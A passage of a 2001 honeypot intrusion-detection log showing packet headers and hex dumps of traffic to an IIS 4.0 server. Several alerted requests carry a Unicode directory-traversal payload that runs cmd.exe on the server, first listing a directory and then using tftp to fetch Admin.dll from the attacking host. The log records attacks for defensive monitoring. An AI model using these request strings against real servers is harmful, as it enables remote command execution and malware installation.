port=80 -> dport: 3888 flags=***A**S* seq=287934 ack=461005599 off=6 res=0 win=8760 urp=0 chksum=53709 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25199) [2001-09-18 10:17:15] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=26772 flags=0 offset=0 TTL=118 chksum=11015 TCP: port=3785 -> dport: 80 flags=*****R** seq=461004526 ack=461004526 off=5 res=0 win=0 urp=0 chksum=64193 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25200) [2001-09-18 10:17:15] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=30868 flags=0 offset=0 TTL=119 chksum=55814 TCP: port=3888 -> dport: 80 flags=***A**** seq=461005599 ack=287935 off=5 res=0 win=8760 urp=0 chksum=59786 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25201) [2001-09-18 10:17:15] spp_unidecode: Unicode Directory Transversal attack detected IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=136 ID=31124 flags=0 offset=0 TTL=119 chksum=55462 TCP: port=3888 -> dport: 80 flags=***AP*** seq=461005599 ack=287935 off=5 res=0 win=8760 urp=0 chksum=41120 Payload: length = 94 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste 020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d 030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 ir r HTTP/1.0..H 040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: www..Connne 050 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A ction: close.. ---------------------------------------------------------------------------- -- #(2 - 25202) [2001-09-18 10:17:15] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=40 ID=56064 flags=0 offset=0 TTL=128 chksum=28314 TCP: port=80 -> dport: 3888 flags=***A**** seq=287935 ack=461005695 off=5 res=0 win=8664 urp=0 chksum=59786 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25203) [2001-09-18 10:17:15] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=231 ID=56320 flags=0 offset=0 TTL=128 chksum=27867 TCP: port=80 -> dport: 3888 flags=***AP*** seq=287935 ack=461005695 off=5 res=0 win=8664 urp=0 chksum=38356 Payload: length = 191 000 : 48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D HTTP/1.1 200 OK. 010 : 0A 53 65 72 76 65 72 3A 20 4D 69 63 72 6F 73 6F .Server: Microso 020 : 66 74 2D 49 49 53 2F 34 2E 30 0D 0A 44 61 74 65 ft-IIS/4.0..Date 030 : 3A 20 54 75 65 2C 20 31 38 20 53 65 70 20 32 30 : Tue, 18 Sep 20 040 : 30 31 20 31 36 3A 30 30 3A 35 36 20 47 4D 54 0D 01 16:00:56 GMT. 050 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61 .Content-Type: a 060 : 70 70 6C 69 63 61 74 69 6F 6E 2F 6F 63 74 65 74 pplication/octet 070 : 2D 73 74 72 65 61 6D 0D 0A 56 6F 6C 75 6D 65 20 -stream..Volume 080 : 69 6E 20 64 72 69 76 65 20 43 20 68 61 73 20 6E in drive C has n 090 : 6F 20 6C 61 62 65 6C 2E 0D 0A 56 6F 6C 75 6D 65 o label...Volume 0a0 : 20 53 65 72 69 61 6C 20 4E 75 6D 62 65 72 20 69 Serial Number i 0b0 : 73 20 38 30 42 34 2D 38 39 43 41 0D 0A 0D 0A s 80B4-89CA.... ---------------------------------------------------------------------------- -- #(2 - 25204) [2001-09-18 10:17:15] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=260 ID=56576 flags=0 offset=0 TTL=128 chksum=27582 TCP: port=80 -> dport: 3888 flags=***AP**F seq=288126 ack=461005695 off=5 res=0 win=8664 urp=0 chksum=38130 Payload: length = 220 000 : 20 44 69 72 65 63 74 6F 72 79 20 6F 66 20 43 3A Directory of C: 010 : 5C 49 6E 65 74 70 75 62 5C 73 63 72 69 70 74 73 \Inetpub\scripts 020 : 0D 0A 0D 0A 30 39 2F 31 38 2F 30 31 20 20 31 30 ....09/18/01 10 030 : 3A 35 33 61 20 20 20 20 20 20 20 20 3C 44 49 52 :53a <DIR 040 : 3E 20 20 20 20 20 20 20 20 20 20 2E 0D 0A 30 39 > ...09 050 : 2F 31 38 2F 30 31 20 20 31 30 3A 35 33 61 20 20 /18/01 10:53a 060 : 20 20 20 20 20 20 3C 44 49 52 3E 20 20 20 20 20 <DIR> 070 : 20 20 20 20 20 2E 2E 0D 0A 20 20 20 20 20 20 20 .... 080 : 20 20 20 20 20 20 20 20 32 20 46 69 6C 65 28 73 2 File(s 090 : 29 20 20 20 20 20 20 20 20 20 20 20 20 20 20 30 ) 0 0a0 : 20 62 79 74 65 73 0D 0A 20 20 20 20 20 20 20 20 bytes.. 0b0 : 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0c0 : 20 20 32 2C 31 30 31 2C 30 32 32 2C 32 30 38 20 2,101,022,208 0d0 : 62 79 74 65 73 20 66 72 65 65 0D 0A bytes free.. ---------------------------------------------------------------------------- -- #(2 - 25205) [2001-09-18 10:17:15] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=40084 flags=0 offset=0 TTL=118 chksum=46854 TCP: port=3888 -> dport: 80 flags=*****R** seq=461005695 ack=0 off=5 res=0 win=0 urp=0 chksum=28722 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25206) [2001-09-18 10:17:15] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=44 ID=40340 flags=0 offset=0 TTL=118 chksum=46594 TCP: port=3905 -> dport: 80 flags=******S* seq=461005740 ack=0 off=6 res=0 win=8192 urp=0 chksum=14394 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25207) [2001-09-18 10:17:15] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=44 ID=56832 flags=0 offset=0 TTL=128 chksum=27542 TCP: port=80 -> dport: 3905 flags=***A**S* seq=288344 ack=461005741 off=6 res=0 win=8760 urp=0 chksum=53140 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25208) [2001-09-18 10:17:15] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=40596 flags=0 offset=0 TTL=118 chksum=62726 TCP: port=3888 -> dport: 80 flags=*****R** seq=461005695 ack=461005695 off=5 res=0 win=0 urp=0 chksum=61752 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25209) [2001-09-18 10:17:15] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=43924 flags=0 offset=0 TTL=119 chksum=42758 TCP: port=3905 -> dport: 80 flags=***A**** seq=461005741 ack=288345 off=5 res=0 win=8760 urp=0 chksum=59217 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25210) [2001-09-18 10:17:15] spp_unidecode: Unicode Directory Transversal attack detected IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=191 ID=44180 flags=0 offset=0 TTL=119 chksum=42351 TCP: port=3905 -> dport: 80 flags=***AP*** seq=461005741 ack=288345 off=5 res=0 win=8760 urp=0 chksum=246 Payload: length = 139 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste 020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 74 m32/cmd.exe?/c+t 030 : 66 74 70 20 2D 69 20 36 35 2E 32 39 2E 32 34 33 ftp -i 65.29.243 040 : 2E 31 38 30 20 47 45 54 20 41 64 6D 69 6E 2E 64 .180 GET Admin.d 050 : 6C 6C 20 63 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 ll c:\Admin.dll 060 : 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 48 54 54 50 :\Admin.dll HTTP 070 : 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D /1.0..Host: www. 080 : 0A 43 6F 6E 6E 6E 65 63 74 69 6F .Connnectio ---------------------------------------------------------------------------- -- #(2 - 25211) [2001-09-18 10:17:15] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=40 ID=57344 flags=0 offset=0 TTL=128 chksum=27034 TCP: port=80 -> dport: 3905 flags=***A**** seq=288345 ack=461005892 off=5 res=0 win=8609 urp=0 chksum=59217 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25214) [2001-09-18 10:17:17] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=6038 flags=0 offset=0 TTL=118 chksum=31749 TCP: port=3585 -> dport: 80 flags=*****R** seq=461002562 ack=461002562 off=5 res=0 win=0 urp=0 chksum=2786 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25227) [2001-09-18 10:18:29] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=395 ID=59649 flags=0 offset=0 TTL=128 chksum=24374 TCP: port=80 -> dport: 3905 flags=***AP*** seq=288345 ack=461005892 off=5 res=0 win=8609 urp=0 chksum=33293 Payload: length = 355 000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74 HTTP/1.1 502 Gat 010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76 eway Error..Serv 020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 er: Microsoft-II 030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 S/4.0..Date: Tue 040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 , 18 Sep 2001 16 050 : 3A 30 32 3A 30 39 20 47 4D 54 0D 0A 43 6F 6E 74 :02:09 GMT..Cont 060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D ent-Length: 215. 070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 .Content-Type: t 080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61 ext/html....<hea 090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69 d><title>Error i 0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F n CGI Applicatio 0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E n</title></head> 0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45 .<body><h1>CGI E 0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65 rror</h1>The spe 0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69 cified CGI appli 0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65 cation misbehave 100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69 d by not returni 110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65 ng a complete se 120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72 t of HTTP header 130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20 s. The headers 140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72 it did return ar 150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70 e:<p><p><pre></p 160 : 72 65 3E re> ---------------------------------------------------------------------------- -- #(2 - 25228) [2001-09-18 10:18:29] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=40 ID=59905 flags=0 offset=0 TTL=128 chksum=24473 TCP: port=80 -> dport: 3905 flags=***A***F seq=288700 ack=461005892 off=5 res=0 win=8609 urp=0 chksum=58861 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25229) [2001-09-18 10:18:29] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=43478 flags=0 offset=0 TTL=118 chksum=43460 TCP: port=3905 -> dport: 80 flags=*****R** seq=461005892 ack=0 off=5 res=0 win=0 urp=0 chksum=28508 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25230) [2001-09-18 10:18:29] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=44 ID=43734 flags=0 offset=0 TTL=118 chksum=43200 TCP: port=2710 -> dport: 80 flags=******S* seq=467601707 ack=0 off=6 res=0 win=8192 urp=0 chksum=38657 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25231) [2001-09-18 10:18:29] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=44 ID=60929 flags=0 offset=0 TTL=128 chksum=23445 TCP: port=80 -> dport: 2710 flags=***A**S* seq=362501 ack=467601708 off=6 res=0 win=8760 urp=0 chksum=3246 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25232) [2001-09-18 10:18:29] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=43990 flags=0 offset=0 TTL=118 chksum=59332 TCP: port=3905 -> dport: 80 flags=*****R** seq=461005892 ack=461005892 off=5 res=0 win=0 urp=0 chksum=61341 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25233) [2001-09-18 10:18:30] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=41431 flags=0 offset=0 TTL=119 chksum=45251 TCP: port=2710 -> dport: 80 flags=***A**** seq=467601708 ack=362502 off=5 res=0 win=8760 urp=0 chksum=9323 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25234) [2001-09-18 10:18:30] spp_unidecode: Unicode Directory Transversal attack detected IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=191 ID=41687 flags=0 offset=0 TTL=119 chksum=44844 TCP: port=2710 -> dport: 80 flags=***AP*** seq=467601708 ack=362502 off=5 res=0 win=8760 urp=0 chksum=15886 Payload: length = 139 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste 020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 74 m32/cmd.exe?/c+t 030 : 66 74 70 20 2D 69 20 36 35 2E 32 39 2E 32 34 33 ftp -i 65.29.243 040 : 2E 31 38 30 20 47 45 54 20 41 64 6D 69 6E 2E 64 .180 GET Admin.d 050 : 6C 6C 20 64 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 ll d:\Admin.dll 060 : 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 48 54 54 50 :\Admin.dll HTTP 070 : 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D /1.0..Host: www. 080 : 0A 43 6F 6E 6E 6E 65 63 74 69 6F .Connnectio ---------------------------------------------------------------------------- -- #(2 - 25235) [2001-09-18 10:18:30] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=40 ID=61441 flags=0 offset=0 TTL=128 chksum=22937 TCP: port=80 -> dport: 2710 flags=***A**** seq=362502 ack=467601859 off=5 res=0 win=8609 urp=0 chksum=9323 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25236) [2001-09-18 10:19:31] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=395 ID=62978 flags=0 offset=0 TTL=128 chksum=21045 TCP: port=80 -> dport: 2710 flags=***AP*** seq=362502 ack=467601859 off=5 res=0 win=8609 urp=0 chksum=48429 Payload: length = 355 000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74 HTTP/1.1 502 Gat 010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76 eway Error..Serv 020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 er: Microsoft-II 030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 S/4.0..Date: Tue 040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 , 18 Sep 2001 16 050 : 3A 30 33 3A 31 32 20 47 4D 54 0D 0A 43 6F 6E 74 :03:12 GMT..Cont 060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D ent-Length: 215. 070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 .Content-Type: t 080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61 ext/html....<hea 090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69 d><title>Error i 0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F n CGI Applicatio 0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E n</title></head> 0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45 .<body><h1>CGI E 0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65 rror</h1>The spe 0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69 cified CGI appli 0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65 cation misbehave 100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69 d by not returni 110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65 ng a complete se 120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72 t of HTTP header 130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20 s. The headers 140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72 it did return ar 150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70 e:<p><p><pre></p 160 : 72 65 3E re> ---------------------------------------------------------------------------- -- #(2 - 25237) [2001-09-18 10:19:31] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=40 ID=63234 flags=0 offset=0 TTL=128 chksum=21144 TCP: port=80 -> dport: 2710 flags=***A***F seq=362857 ack=467601859 off=5 res=0 win=8609 urp=0 chksum=8967 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25238) [2001-09-18 10:19:31] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=38410 flags=0 offset=0 TTL=118 chksum=48528 TCP: port=2710 -> dport: 80 flags=*****R** seq=467601859 ack=0 off=5 res=0 win=0 urp=0 chksum=52771 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25239) [2001-09-18 10:19:31] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=44 ID=38666 flags=0 offset=0 TTL=118 chksum=48268 TCP: port=4497 -> dport: 80 flags=******S* seq=473163564 ack=0 off=6 res=0 win=8192 urp=0 chksum=45488 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25240) [2001-09-18 10:19:31] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=44 ID=64002 flags=0 offset=0 TTL=128 chksum=20372 TCP: port=80 -> dport: 4497 flags=***A**S* seq=424219 ack=473163565 off=6 res=0 win=8760 urp=0 chksum=13894 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25241) [2001-09-18 10:19:31] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=38922 flags=0 offset=0 TTL=118 chksum=64400 TCP: port=2710 -> dport: 80 flags=*****R** seq=467601859 ack=467601859 off=5 res=0 win=0 urp=0 chksum=43137 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25242) [2001-09-18 10:19:31] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=42250 flags=0 offset=0 TTL=119 chksum=44432 TCP: port=4497 -> dport: 80 flags=***A**** seq=473163565 ack=424220 off=5 res=0 win=8760 urp=0 chksum=19971 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25243) [2001-09-18 10:19:31] spp_unidecode: Unicode Directory Transversal attack detected IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=191 ID=42506 flags=0 offset=0 TTL=119 chksum=44025 TCP: port=4497 -> dport: 80 flags=***AP*** seq=473163565 ack=424220 off=5 res=0 win=8760 urp=0 chksum=26533 Payload: length = 139 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste 020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 74 m32/cmd.exe?/c+t 030 : 66 74 70 20 2D 69 20 36 35 2E 32 39 2E 32 34 33 ftp -i 65.29.243 040 : 2E 31 38 30 20 47 45 54 20 41 64 6D 69 6E 2E 64 .180 GET Admin.d 050 : 6C 6C 20 65 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 ll e:\Admin.dll 060 : 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 48 54 54 50 :\Admin.dll HTTP 070 : 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D /1.0..Host: www. 080 : 0A 43 6F 6E 6E 6E 65 63 74 69 6F .Connnectio ---------------------------------------------------------------------------- -- #(2 - 25244) [2001-09-18 10:19:31] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=40 ID=64514 flags=0 offset=0 TTL=128 chksum=19864 TCP: port=80 -> dport: 4497 flags=***A**** seq=424220 ack=473163716 off=5 res=0 win=8609 urp=0 chksum=19971 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25379) [2001-09-18 10:20:33] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=395 ID=22020 flags=0 offset=0 TTL=128 chksum=62003 TCP: port=80 -> dport: 4497 flags=***AP*** seq=424220 ack=473163716 off=5 res=0 win=8609 urp=0 chksum=58819 Payload: length = 355 000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74 HTTP/1.1 502 Gat 010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76 eway Error..Serv 020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 er: Microsoft-II 030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 S/4.0..Date: Tue 040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 , 18 Sep 2001 16 050 : 3A 30 34 3A 31 34 20 47 4D 54 0D 0A 43 6F 6E 74 :04:14 GMT..Cont 060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D ent-Length: 215. 070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 .Content-Type: t 080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61 ext/html....<hea 090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69 d><title>Error i 0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F n CGI Applicatio 0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E n</title></head> 0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45 .<body><h1>CGI E 0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65 rror</h1>The spe 0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69 cified CGI appli 0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65 cation misbehave 100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69 d by not returni 110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65 ng a complete se 120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72 t of HTTP header 130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20 s. The headers 140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72 it did return ar 150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70 e:<p><p><pre></p 160 : 72 65 3E re> ---------------------------------------------------------------------------- -- #(2 - 25380) [2001-09-18 10:20:33] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=40 ID=22276 flags=0 offset=0 TTL=128 chksum=62102 TCP: port=80 -> dport: 4497 flags=***A***F seq=424575 ack=473163716 off=5 res=0 win=8609 urp=0 chksum=19615 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25381) [2001-09-18 10:20:33] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=34110 flags=0 offset=0 TTL=118 chksum=52828 TCP: port=4497 -> dport: 80 flags=*****R** seq=473163716 ack=0 off=5 res=0 win=0 urp=0 chksum=59602 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25382) [2001-09-18 10:20:33] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=44 ID=34366 flags=0 offset=0 TTL=118 chksum=52568 TCP: port=2154 -> dport: 80 flags=******S* seq=478595545 ack=0 off=6 res=0 win=8192 urp=0 chksum=55255 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25383) [2001-09-18 10:20:33] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=44 ID=23556 flags=0 offset=0 TTL=128 chksum=60818 TCP: port=80 -> dport: 2154 flags=***A**S* seq=486299 ack=478595546 off=6 res=0 win=8760 urp=0 chksum=27116 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25384) [2001-09-18 10:20:33] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=34622 flags=0 offset=0 TTL=118 chksum=3165 TCP: port=4497 -> dport: 80 flags=*****R** seq=473163716 ack=473163716 off=5 res=0 win=0 urp=0 chksum=58586 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25385) [2001-09-18 10:20:33] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=41790 flags=0 offset=0 TTL=119 chksum=44892 TCP: port=2154 -> dport: 80 flags=***A**** seq=478595546 ack=486300 off=5 res=0 win=8760 urp=0 chksum=33193 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25386) [2001-09-18 10:20:33] spp_unidecode: Unicode Directory Transversal attack detected IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=116 ID=42046 flags=0 offset=0 TTL=119 chksum=44560 TCP: port=2154 -> dport: 80 flags=***AP*** seq=478595546 ack=486300 off=5 res=0 win=8760 urp=0 chksum=47995 Payload: length = 74 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 35 63 2E 2E 2F 41 64 6D 69 6E 2E 64 6C 6C 20 6C 5c../Admin.dll l 020 : 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A HTTP/1.0..Host: 030 : 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63 74 69 6F www..Connnectio 040 : 6E 3A 20 63 6C 6F 73 65 0D 0A n: close.. ---------------------------------------------------------------------------- -- #(2 - 25387) [2001-09-18 10:20:34] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=40 ID=25092 flags=0 offset=0 TTL=128 chksum=59286 TCP: port=80 -> dport: 2154 flags=***A**** seq=486300 ack=478595622 off=5 res=0 win=8684 urp=0 chksum=33193 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25388) [2001-09-18 10:20:34] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=279 ID=26116 flags=0 offset=0 TTL=128 chksum=58023 TCP: port=80 -> dport: 2154 flags=***AP*** seq=486300 ack=478595622 off=5 res=0 win=8684 urp=0 chksum=19230 Payload: length = 239 000 : 48 54 54 50 2F 31 2E 31 20 35 30 30 20 53 65 72 HTTP/1.1 500 Ser 010 : 76 65 72 20 45 72 72 6F 72 0D 0A 53 65 72 76 65 ver Error..Serve 020 : 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 53 r: Microsoft-IIS 030 : 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 